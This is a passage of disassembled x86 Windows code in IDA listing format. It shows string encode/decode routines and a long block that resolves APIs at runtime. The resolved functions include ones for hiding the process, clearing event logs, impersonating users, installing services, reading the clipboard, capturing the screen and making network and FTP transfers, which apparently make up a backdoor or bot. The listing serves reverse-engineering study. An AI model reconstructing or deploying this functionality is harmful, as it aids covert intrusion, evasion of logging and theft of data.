mov ecx, [ebp+arg_0]
pop edi
pop esi
mov [ecx], edx
mov ecx, [ebp+arg_4]
pop ebx
mov [ecx], eax
leave
retn 8
sub_416B63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ED6 proc near ; CODE XREF: sub_417010+76�p
; sub_41714C+79�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
push edi
mov [ebp+var_8], ecx
xor eax, eax
loc_416EE6: ; CODE XREF: sub_416ED6+21�j
mov edx, [ecx]
mov edi, dword_441760[eax]
mov [eax+edx], edi
add eax, 4
cmp eax, 48h
jl short loc_416EE6
xor eax, eax
loc_416EFB: ; CODE XREF: sub_416ED6+41�j
mov edx, 13Ah
loc_416F00: ; CODE XREF: sub_416ED6+3A�j
mov edi, [ecx+4]
mov ebx, dword_4417A8[eax]
mov [eax+edi], ebx
add eax, 4
dec edx
jnz short loc_416F00
cmp eax, 13A0h
jl short loc_416EFB
mov ebx, [ebp+arg_0]
mov [ebp+var_4], esi
loc_416F1F: ; CODE XREF: sub_416ED6+A9�j
lea eax, [esi+1]
cdq
idiv [ebp+arg_4]
mov eax, [ebp+var_8]
movzx edi, byte ptr [esi+ebx]
mov eax, [eax]
shl edi, 18h
and edi, 0FF00FFFFh
movzx ecx, byte ptr [edx+ebx]
mov edx, [ebp+var_4]
add [ebp+var_4], 4
add edx, eax
lea eax, [esi+2]
mov [ebp+var_C], edx
cdq
idiv [ebp+arg_4]
shl ecx, 10h
xor ecx, edi
xor eax, eax
xor cx, cx
mov ah, [edx+ebx]
xor eax, ecx
mov ecx, eax
lea eax, [esi+3]
cdq
idiv [ebp+arg_4]
movzx eax, byte ptr [edx+ebx]
or ecx, eax
mov eax, [ebp+var_C]
xor [eax], ecx
lea eax, [esi+4]
cdq
idiv [ebp+arg_4]
cmp [ebp+var_4], 48h
mov esi, edx
jl short loc_416F1F
xor esi, esi
mov [ebp+arg_4], esi
mov [ebp+arg_0], esi
loc_416F89: ; CODE XREF: sub_416ED6+DC�j
mov edi, [ebp+var_8]
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, edi
call sub_4167F2
mov eax, [edi]
mov ecx, [ebp+arg_4]
mov [esi+eax], ecx
mov eax, [edi]
mov ecx, [ebp+arg_0]
mov [esi+eax+4], ecx
add esi, 8
cmp esi, 48h
jl short loc_416F89
push 4
pop esi
loc_416FB7: ; CODE XREF: sub_416ED6+117�j
mov ebx, 9Dh
loc_416FBC: ; CODE XREF: sub_416ED6+10F�j
mov edi, [ebp+var_8]
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, edi
call sub_4167F2
mov eax, [edi+4]
mov ecx, [ebp+arg_4]
mov [esi+eax-4], ecx
mov eax, [edi+4]
mov ecx, [ebp+arg_0]
mov [esi+eax], ecx
add esi, 8
dec ebx
jnz short loc_416FBC
cmp esi, 13A4h
jl short loc_416FB7
pop edi
pop esi
pop ebx
leave
retn 8
sub_416ED6 endp
; =============== S U B R O U T I N E =======================================
sub_416FF6 proc near ; CODE XREF: sub_41714C+9A�p
; sub_41714C+B5�p
arg_0 = byte ptr 4
xor eax, eax
loc_416FF8: ; CODE XREF: sub_416FF6+15�j
mov ecx, off_442B48
mov cl, [ecx+eax]
cmp cl, [esp+arg_0]
jz short locret_41700F
inc eax
cmp eax, 40h
jl short loc_416FF8
xor eax, eax
locret_41700F: ; CODE XREF: sub_416FF6+F�j
retn
sub_416FF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417010 proc near ; CODE XREF: sub_41553D+1E�p
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push [ebp+arg_4]
mov esi, dword_437088
call esi ; dword_437088
add eax, 9
push eax
call sub_42B407
pop ecx
mov ebx, eax
push [ebp+arg_4]
push ebx
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_0]
test eax, eax
jz loc_417146
cmp byte ptr [eax], 0
jz loc_417146
push edi
mov edi, ebx
push [ebp+arg_4]
call esi ; dword_437088
lea eax, [eax+eax+12h]
push eax
call sub_42B407
cmp byte ptr [ebx], 0
pop ecx
mov [ebp+var_4], eax
jz short loc_41706E
loc_417068: ; CODE XREF: sub_417010+5C�j
inc edi
cmp byte ptr [edi], 0
jnz short loc_417068
loc_41706E: ; CODE XREF: sub_417010+56�j
xor eax, eax
lea ecx, [ebp+var_C]
stosd
stosd
call sub_4167BC
push [ebp+arg_0]
call esi ; dword_437088
push eax
lea ecx, [ebp+var_C]
push [ebp+arg_0]
call sub_416ED6
cmp byte ptr [ebx], 0
mov edi, [ebp+var_4]
mov esi, ebx
jz loc_41712E
loc_417099: ; CODE XREF: sub_417010+118�j
movzx eax, byte ptr [esi]
shl eax, 18h
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 10h
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 8
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
add eax, ecx
inc esi
mov [ebp+arg_0], eax
movzx eax, byte ptr [esi]
shl eax, 18h
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 10h
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 8
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
add eax, ecx
lea ecx, [ebp+var_C]
mov [ebp+arg_4], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
inc esi
call sub_4167F2
push 6
pop eax
loc_4170F0: ; CODE XREF: sub_417010+F7�j
mov ecx, [ebp+arg_4]
mov edx, off_442B48
shr [ebp+arg_4], 6
and ecx, 3Fh
mov cl, [ecx+edx]
mov [edi], cl
inc edi
dec eax
jnz short loc_4170F0
push 6
pop eax
loc_41710C: ; CODE XREF: sub_417010+113�j
mov ecx, [ebp+arg_0]
mov edx, off_442B48
shr [ebp+arg_0], 6
and ecx, 3Fh
mov cl, [ecx+edx]
mov [edi], cl
inc edi
dec eax
jnz short loc_41710C
cmp byte ptr [esi], 0
jnz loc_417099
loc_41712E: ; CODE XREF: sub_417010+83�j
and byte ptr [edi], 0
push ebx
call sub_429006
pop ecx
lea ecx, [ebp+var_C]
call sub_4167DC
mov eax, [ebp+var_4]
pop edi
jmp short loc_417148
; ---------------------------------------------------------------------------
loc_417146: ; CODE XREF: sub_417010+2E�j
; sub_417010+37�j
mov eax, ebx
loc_417148: ; CODE XREF: sub_417010+134�j
pop esi
pop ebx
leave
retn
sub_417010 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41714C proc near ; CODE XREF: sub_41557B+1E�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push [ebp+arg_4]
mov esi, dword_437088
call esi ; dword_437088
add eax, 0Ch
push eax
call sub_42B407
pop ecx
mov ebx, eax
push [ebp+arg_4]
mov [ebp+var_8], ebx
push ebx
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_0]
test eax, eax
jz loc_417296
cmp byte ptr [eax], 0
jz loc_417296
push edi
mov edi, ebx
push [ebp+arg_4]
call esi ; dword_437088
add eax, 0Ch
push eax
call sub_42B407
cmp byte ptr [ebx], 0
pop ecx
mov [ebp+var_4], eax
jz short loc_4171AC
loc_4171A6: ; CODE XREF: sub_41714C+5E�j
inc edi
cmp byte ptr [edi], 0
jnz short loc_4171A6
loc_4171AC: ; CODE XREF: sub_41714C+58�j
xor eax, eax
lea ecx, [ebp+var_10]
stosd
stosd
stosd
call sub_4167BC
push [ebp+arg_0]
call esi ; dword_437088
push eax
lea ecx, [ebp+var_10]
push [ebp+arg_0]
call sub_416ED6
cmp byte ptr [ebx], 0
mov esi, [ebp+var_4]
mov edi, ebx
jz loc_41727E
loc_4171D8: ; CODE XREF: sub_41714C+129�j
and [ebp+arg_0], 0
and [ebp+arg_4], 0
xor edx, edx
loc_4171E2: ; CODE XREF: sub_41714C+AD�j
mov al, [edi]
inc edi
push eax
call sub_416FF6
pop ecx
mov ecx, edx
add edx, 6
shl eax, cl
or [ebp+arg_0], eax
cmp edx, 24h
jl short loc_4171E2
xor edx, edx
loc_4171FD: ; CODE XREF: sub_41714C+C8�j
mov al, [edi]
inc edi
push eax
call sub_416FF6
pop ecx
mov ecx, edx
add edx, 6
shl eax, cl
or [ebp+arg_4], eax
cmp edx, 24h
jl short loc_4171FD
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_10]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_416B63
push 18h
xor edx, edx
pop eax
loc_41722B: ; CODE XREF: sub_41714C+FE�j
mov ebx, 0FFh
mov ecx, eax
shl ebx, cl
push 18h
sub eax, 8
pop ecx
sub ecx, edx
add edx, 8
and ebx, [ebp+arg_4]
shr ebx, cl
mov [esi], bl
inc esi
cmp eax, 0FFFFFFF8h
jg short loc_41722B
push 18h
xor edx, edx
pop eax
loc_417251: ; CODE XREF: sub_41714C+124�j
mov ebx, 0FFh
mov ecx, eax
shl ebx, cl
push 18h
sub eax, 8
pop ecx
sub ecx, edx
add edx, 8
and ebx, [ebp+arg_0]
shr ebx, cl
mov [esi], bl
inc esi
cmp eax, 0FFFFFFF8h
jg short loc_417251
cmp byte ptr [edi], 0
jnz loc_4171D8
mov ebx, [ebp+var_8]
loc_41727E: ; CODE XREF: sub_41714C+86�j
and byte ptr [esi], 0
push ebx
call sub_429006
pop ecx
lea ecx, [ebp+var_10]
call sub_4167DC
mov eax, [ebp+var_4]
pop edi
jmp short loc_417298
; ---------------------------------------------------------------------------
loc_417296: ; CODE XREF: sub_41714C+31�j
; sub_41714C+3A�j
mov eax, ebx
loc_417298: ; CODE XREF: sub_41714C+148�j
pop esi
pop ebx
leave
retn
sub_41714C endp
; =============== S U B R O U T I N E =======================================
sub_41729C proc near ; CODE XREF: sub_418D49+A�p
push ebx
push ebp
mov ebp, dword_437070
push esi
push edi
push offset aKernel32_dll_0 ; "kernel32.dll"
call ebp ; dword_437070
mov esi, dword_437030
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4173C8
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; dword_437030
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_456FE4, eax
call esi ; dword_437030
push offset aProcess32first ; "Process32First"
push edi
mov dword_456F40, eax
call esi ; dword_437030
push offset aProcess32next ; "Process32Next"
push edi
mov dword_456F1C, eax
call esi ; dword_437030
push offset aModule32first ; "Module32First"
push edi
mov dword_456DEC, eax
call esi ; dword_437030
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_456D90, eax
call esi ; dword_437030
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_456DBC, eax
call esi ; dword_437030
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_456E4C, eax
call esi ; dword_437030
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_456F88, eax
call esi ; dword_437030
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_457000, eax
call esi ; dword_437030
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_456DFC, eax
call esi ; dword_437030
push offset aGetcomputernam ; "GetComputerNameA"
push edi
mov dword_456DD8, eax
call esi ; dword_437030
cmp dword_456FE4, ebx
mov dword_456F70, eax
jz short loc_4173AF
cmp dword_456F40, ebx
jz short loc_4173AF
cmp dword_456F1C, ebx
jz short loc_4173AF
cmp dword_456DEC, ebx
jz short loc_4173AF
cmp dword_456DBC, ebx
jz short loc_4173AF
cmp dword_456E4C, ebx
jz short loc_4173AF
cmp dword_456F88, ebx
jz short loc_4173AF
cmp dword_457000, ebx
jz short loc_4173AF
cmp dword_456DFC, ebx
jz short loc_4173AF
cmp dword_456DD8, ebx
jz short loc_4173AF
cmp eax, ebx
jnz short loc_4173B9
loc_4173AF: ; CODE XREF: sub_41729C+C5�j
; sub_41729C+CD�j ...
mov dword_457004, 1
loc_4173B9: ; CODE XREF: sub_41729C+111�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; dword_437030
mov dword_456F54, eax
jmp short loc_4173DD
; ---------------------------------------------------------------------------
loc_4173C8: ; CODE XREF: sub_41729C+1D�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457008, eax
mov dword_457004, 1
loc_4173DD: ; CODE XREF: sub_41729C+12A�j
push offset aUser32_dll ; "user32.dll"
call dword_437034 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_417531
push offset aClosewindow ; "CloseWindow"
push edi
call esi ; dword_437030
push offset aSendmessagea ; "SendMessageA"
push edi
mov dword_456E60, eax
call esi ; dword_437030
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_456F7C, eax
call esi ; dword_437030
push offset aIswindow ; "IsWindow"
push edi
mov dword_456F24, eax
call esi ; dword_437030
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_456E90, eax
call esi ; dword_437030
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_456FE8, eax
call esi ; dword_437030
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_456ED4, eax
call esi ; dword_437030
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_456F04, eax
call esi ; dword_437030
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_456F74, eax
call esi ; dword_437030
cmp dword_456E60, ebx
mov dword_456E1C, eax
jz short loc_4174AB
cmp dword_456F7C, ebx
jz short loc_4174AB
cmp dword_456F24, ebx
jz short loc_4174AB
cmp dword_456E90, ebx
jz short loc_4174AB
cmp dword_456FE8, ebx
jz short loc_4174AB
cmp dword_456ED4, ebx
jz short loc_4174AB
cmp dword_456F04, ebx
jz short loc_4174AB
cmp dword_456F74, ebx
jz short loc_4174AB
cmp eax, ebx
jnz short loc_4174B5
loc_4174AB: ; CODE XREF: sub_41729C+1D1�j
; sub_41729C+1D9�j ...
mov dword_45700C, 1
loc_4174B5: ; CODE XREF: sub_41729C+20D�j
push offset aEnumwindows ; "EnumWindows"
push edi
call esi ; dword_437030
push offset aGetwindowinfo ; "GetWindowInfo"
push edi
mov dword_456FCC, eax
call esi ; dword_437030
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
push edi
mov dword_456EA8, eax
call esi ; dword_437030
push offset aShowwindow ; "ShowWindow"
push edi
mov dword_456DCC, eax
call esi ; dword_437030
push offset aIswindowvisibl ; "IsWindowVisible"
push edi
mov dword_456EAC, eax
call esi ; dword_437030
push offset aGetclassnamea ; "GetClassNameA"
push edi
mov dword_456ED8, eax
call esi ; dword_437030
cmp dword_456FCC, ebx
mov dword_456FF4, eax
jz short loc_41753C
cmp dword_456EA8, ebx
jz short loc_41753C
cmp dword_456DCC, ebx
jz short loc_41753C
cmp dword_456EAC, ebx
jz short loc_41753C
cmp dword_456ED8, ebx
jz short loc_41753C
cmp eax, ebx
jnz short loc_417546
jmp short loc_41753C
; ---------------------------------------------------------------------------
loc_417531: ; CODE XREF: sub_41729C+150�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457010, eax
loc_41753C: ; CODE XREF: sub_41729C+26D�j
; sub_41729C+275�j ...
mov dword_45700C, 1
loc_417546: ; CODE XREF: sub_41729C+291�j
push offset aAdvapi32_dll ; "advapi32.dll"
call dword_437034 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_417838
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; dword_437030
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_456FA0, eax
call esi ; dword_437030
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_456EB4, eax
call esi ; dword_437030
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_456F44, eax
call esi ; dword_437030
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_456DD0, eax
call esi ; dword_437030
push offset aRegdeletekeya ; "RegDeleteKeyA"
push edi
mov dword_456E44, eax
call esi ; dword_437030
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_456E78, eax
call esi ; dword_437030
push offset aRegenumkeyexa ; "RegEnumKeyExA"
push edi
mov dword_456EE8, eax
call esi ; dword_437030
push offset aRegenumvaluea ; "RegEnumValueA"
push edi
mov dword_456E48, eax
call esi ; dword_437030
push offset aRegqueryinfoke ; "RegQueryInfoKeyA"
push edi
mov dword_456DE4, eax
call esi ; dword_437030
cmp dword_456FA0, ebx
mov dword_456EA4, eax
jz short loc_417621
cmp dword_456EB4, ebx
jz short loc_417621
cmp dword_456F44, ebx
jz short loc_417621
cmp dword_456DD0, ebx
jz short loc_417621
cmp dword_456E44, ebx
jz short loc_417621
cmp dword_456E78, ebx
jz short loc_417621
cmp dword_456EE8, ebx
jz short loc_417621
cmp dword_456DE4, ebx
jz short loc_417621
cmp eax, ebx
jnz short loc_41762B
loc_417621: ; CODE XREF: sub_41729C+347�j
; sub_41729C+34F�j ...
mov dword_457014, 1
loc_41762B: ; CODE XREF: sub_41729C+383�j
push offset aOpenthreadtoke ; "OpenThreadToken"
push edi
call esi ; dword_437030
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
mov dword_456E28, eax
call esi ; dword_437030
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_456EF8, eax
call esi ; dword_437030
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_456EBC, eax
call esi ; dword_437030
cmp dword_456E28, ebx
mov dword_456F94, eax
jz short loc_41767B
cmp dword_456EF8, ebx
jz short loc_41767B
cmp dword_456EBC, ebx
jz short loc_41767B
cmp eax, ebx
jnz short loc_417685
loc_41767B: ; CODE XREF: sub_41729C+3C9�j
; sub_41729C+3D1�j ...
mov dword_457014, 1
loc_417685: ; CODE XREF: sub_41729C+3DD�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; dword_437030
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_456F08, eax
call esi ; dword_437030
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_456DA8, eax
call esi ; dword_437030
push offset aControlservice ; "ControlService"
push edi
mov dword_456DB0, eax
call esi ; dword_437030
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_456E24, eax
call esi ; dword_437030
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_456E30, eax
call esi ; dword_437030
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_456DC4, eax
call esi ; dword_437030
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_456EC0, eax
call esi ; dword_437030
push offset aCreateservicea ; "CreateServiceA"
push edi
mov dword_456DB4, eax
call esi ; dword_437030
push offset aStartservicect ; "StartServiceCtrlDispatcherA"
push edi
mov dword_456F98, eax
call esi ; dword_437030
push offset aImpersonatelog ; "ImpersonateLoggedOnUser"
push edi
mov dword_456FFC, eax
call esi ; dword_437030
push offset aLockservicedat ; "LockServiceDatabase"
push edi
mov dword_456FEC, eax
call esi ; dword_437030
push offset aQueryservicelo ; "QueryServiceLockStatusA"
push edi
mov dword_456DE0, eax
call esi ; dword_437030
push offset aChangeservicec ; "ChangeServiceConfig2A"
push edi
mov dword_456E68, eax
call esi ; dword_437030
push offset aUnlockserviced ; "UnlockServiceDatabase"
push edi
mov dword_456FF0, eax
call esi ; dword_437030
push offset aRegisterserv_0 ; "RegisterServiceCtrlHandlerA"
push edi
mov dword_456F34, eax
call esi ; dword_437030
push offset aSetservicestat ; "SetServiceStatus"
push edi
mov dword_456F30, eax
call esi ; dword_437030
cmp dword_456F08, ebx
mov dword_456E50, eax
jz short loc_4177D6
cmp dword_456DA8, ebx
jz short loc_4177D6
cmp dword_456DB0, ebx
jz short loc_4177D6
cmp dword_456E24, ebx
jz short loc_4177D6
cmp dword_456E30, ebx
jz short loc_4177D6
cmp dword_456DC4, ebx
jz short loc_4177D6
cmp dword_456EC0, ebx
jz short loc_4177D6
cmp dword_456DB4, ebx
jz short loc_4177D6
cmp dword_456FEC, ebx
jz short loc_4177D6
cmp dword_456DE0, ebx
jz short loc_4177D6
cmp dword_456E68, ebx
jz short loc_4177D6
cmp dword_456FF0, ebx
jz short loc_4177D6
cmp dword_456F34, ebx
jz short loc_4177D6
cmp dword_456F30, ebx
jz short loc_4177D6
cmp eax, ebx
jnz short loc_4177E0
loc_4177D6: ; CODE XREF: sub_41729C+4CC�j
; sub_41729C+4D4�j ...
mov dword_457014, 1
loc_4177E0: ; CODE XREF: sub_41729C+538�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; dword_437030
cmp eax, ebx
mov dword_456DAC, eax
jnz short loc_4177FB
mov dword_457014, 1
loc_4177FB: ; CODE XREF: sub_41729C+553�j
push offset aCleareventloga ; "ClearEventLogA"
push edi
call esi ; dword_437030
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_456E80, eax
call esi ; dword_437030
push offset aCloseeventlog ; "CloseEventLog"
push edi
mov dword_456E70, eax
call esi ; dword_437030
cmp dword_456E80, ebx
mov dword_456E2C, eax
jz short loc_417843
cmp dword_456E70, ebx
jz short loc_417843
cmp eax, ebx
jnz short loc_41784D
jmp short loc_417843
; ---------------------------------------------------------------------------
loc_417838: ; CODE XREF: sub_41729C+2B9�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_45701C, eax
loc_417843: ; CODE XREF: sub_41729C+58C�j
; sub_41729C+594�j ...
mov dword_457014, 1
loc_41784D: ; CODE XREF: sub_41729C+598�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; dword_437070
mov edi, eax
cmp edi, ebx
jz loc_417919
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; dword_437030
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_456F00, eax
call esi ; dword_437030
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_456F60, eax
call esi ; dword_437030
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_456F68, eax
call esi ; dword_437030
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_456F20, eax
call esi ; dword_437030
push offset aSelectobject ; "SelectObject"
push edi
mov dword_456E04, eax
call esi ; dword_437030
push offset aBitblt ; "BitBlt"
push edi
mov dword_456DA0, eax
call esi ; dword_437030
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_456F64, eax
call esi ; dword_437030
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_456D8C, eax
call esi ; dword_437030
cmp dword_456F00, ebx
mov dword_456E3C, eax
jz short loc_417924
cmp dword_456F60, ebx
jz short loc_417924
cmp dword_456F68, ebx
jz short loc_417924
cmp dword_456F20, ebx
jz short loc_417924
cmp dword_456E04, ebx
jz short loc_417924
cmp dword_456DA0, ebx
jz short loc_417924
cmp dword_456F64, ebx
jz short loc_417924
cmp dword_456D8C, ebx
jz short loc_417924
cmp eax, ebx
jnz short loc_41792E
jmp short loc_417924
; ---------------------------------------------------------------------------
loc_417919: ; CODE XREF: sub_41729C+5BC�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457024, eax
loc_417924: ; CODE XREF: sub_41729C+63D�j
; sub_41729C+645�j ...
mov dword_457020, 1
loc_41792E: ; CODE XREF: sub_41729C+679�j
mov ebp, dword_437034
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_417BFB
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; dword_437030
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_456E58, eax
call esi ; dword_437030
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_456FDC, eax
call esi ; dword_437030
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_456DE8, eax
call esi ; dword_437030
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_456DB8, eax
call esi ; dword_437030
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_456EA0, eax
call esi ; dword_437030
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_456E84, eax
call esi ; dword_437030
push offset aSocket ; "socket"
push edi
mov dword_456E38, eax
call esi ; dword_437030
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_456FB0, eax
call esi ; dword_437030
push offset aConnect ; "connect"
push edi
mov dword_456FD4, eax
call esi ; dword_437030
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_456E9C, eax
call esi ; dword_437030
push offset aInet_addr ; "inet_addr"
push edi
mov dword_456FBC, eax
call esi ; dword_437030
push offset aHtons ; "htons"
push edi
mov dword_456F5C, eax
call esi ; dword_437030
push offset aHtonl ; "htonl"
push edi
mov dword_456F18, eax
call esi ; dword_437030
push offset aNtohs ; "ntohs"
push edi
mov dword_456F14, eax
call esi ; dword_437030
push offset aNtohl ; "ntohl"
push edi
mov dword_456E10, eax
call esi ; dword_437030
push offset aSend ; "send"
push edi
mov dword_456E08, eax
call esi ; dword_437030
push offset aSendto ; "sendto"
push edi
mov dword_456F6C, eax
call esi ; dword_437030
push offset aRecv ; "recv"
push edi
mov dword_456F8C, eax
call esi ; dword_437030
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_456F38, eax
call esi ; dword_437030
mov dword_456EE4, eax
push offset aBind ; "bind"
push edi
call esi ; dword_437030
push offset aSelect ; "select"
push edi
mov dword_456F4C, eax
call esi ; dword_437030
push offset aListen ; "listen"
push edi
mov dword_456EFC, eax
call esi ; dword_437030
push offset aAccept ; "accept"
push edi
mov dword_456F48, eax
call esi ; dword_437030
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_456FC4, eax
call esi ; dword_437030
push offset aGetsockname ; "getsockname"
push edi
mov dword_456EF0, eax
call esi ; dword_437030
push offset aGethostname ; "gethostname"
push edi
mov dword_456E98, eax
call esi ; dword_437030
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_456F2C, eax
call esi ; dword_437030
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_456FB4, eax
call esi ; dword_437030
push offset aGetpeername ; "getpeername"
push edi
mov dword_456EB8, eax
call esi ; dword_437030
push offset aClosesocket ; "closesocket"
push edi
mov dword_456E34, eax
call esi ; dword_437030
push offset aShutdown ; "shutdown"
push edi
mov dword_456FD0, eax
call esi ; dword_437030
cmp dword_456E58, ebx
mov dword_456FC8, eax
jz loc_417C06
cmp dword_456FDC, ebx
jz loc_417C06
cmp dword_456DE8, ebx
jz loc_417C06
cmp dword_456EA0, ebx
jz loc_417C06
cmp dword_456E84, ebx
jz loc_417C06
cmp dword_456E38, ebx
jz loc_417C06
cmp dword_456FB0, ebx
jz loc_417C06
cmp dword_456FD4, ebx
jz loc_417C06
cmp dword_456E9C, ebx
jz loc_417C06
cmp dword_456FBC, ebx
jz loc_417C06
cmp dword_456F5C, ebx
jz loc_417C06
cmp dword_456F18, ebx
jz loc_417C06
cmp dword_456F14, ebx
jz loc_417C06
cmp dword_456E10, ebx
jz short loc_417C06
cmp dword_456F6C, ebx
jz short loc_417C06
cmp dword_456F8C, ebx
jz short loc_417C06
cmp dword_456F38, ebx
jz short loc_417C06
cmp dword_456EE4, ebx
jz short loc_417C06
cmp dword_456F4C, ebx
jz short loc_417C06
cmp dword_456EFC, ebx
jz short loc_417C06
cmp dword_456F48, ebx
jz short loc_417C06
cmp dword_456FC4, ebx
jz short loc_417C06
cmp dword_456EF0, ebx
jz short loc_417C06
cmp dword_456E98, ebx
jz short loc_417C06
cmp dword_456F2C, ebx
jz short loc_417C06
cmp dword_456FB4, ebx
jz short loc_417C06
cmp dword_456EB8, ebx
jz short loc_417C06
cmp dword_456FD0, ebx
jnz short loc_417C10
jmp short loc_417C06
; ---------------------------------------------------------------------------
loc_417BFB: ; CODE XREF: sub_41729C+6A3�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_45702C, eax
loc_417C06: ; CODE XREF: sub_41729C+84F�j
; sub_41729C+85B�j ...
mov dword_457028, 1
loc_417C10: ; CODE XREF: sub_41729C+95B�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_417D2F
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; dword_437030
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_456E18, eax
call esi ; dword_437030
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_456D94, eax
call esi ; dword_437030
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_456ED0, eax
call esi ; dword_437030
push offset aFtpgetfilea ; "FtpGetFileA"
push edi
mov dword_456E5C, eax
call esi ; dword_437030
push offset aFtpputfilea ; "FtpPutFileA"
push edi
mov dword_456DF8, eax
call esi ; dword_437030
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_456F9C, eax
call esi ; dword_437030
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_456EE0, eax
call esi ; dword_437030
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_456E88, eax
call esi ; dword_437030
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_456DD4, eax
call esi ; dword_437030
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_456DC8, eax
call esi ; dword_437030
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
